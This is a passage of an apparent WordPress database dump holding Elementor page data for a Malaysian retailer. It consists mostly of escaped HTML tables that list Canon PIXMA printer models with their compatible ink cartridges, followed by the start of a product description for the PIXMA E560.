Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP830<\\/td>\\n<td width=\\\"208\\\">CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP970<\\/td>\\n<td width=\\\"208\\\">CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP988<\\/td>\\n<td width=\\\"208\\\">CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\">PIXMA MP996<\\/td>\\n<td width=\\\"208\\\">CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"170\\\"><\\/td>\\n<td width=\\\"208\\\">PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7115,3330,'_wp_page_template','template-fullwidth.php'),(7116,3330,'_elementor_edit_mode','builder'),(7117,3330,'_elementor_template_type','post'),(7118,3330,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA 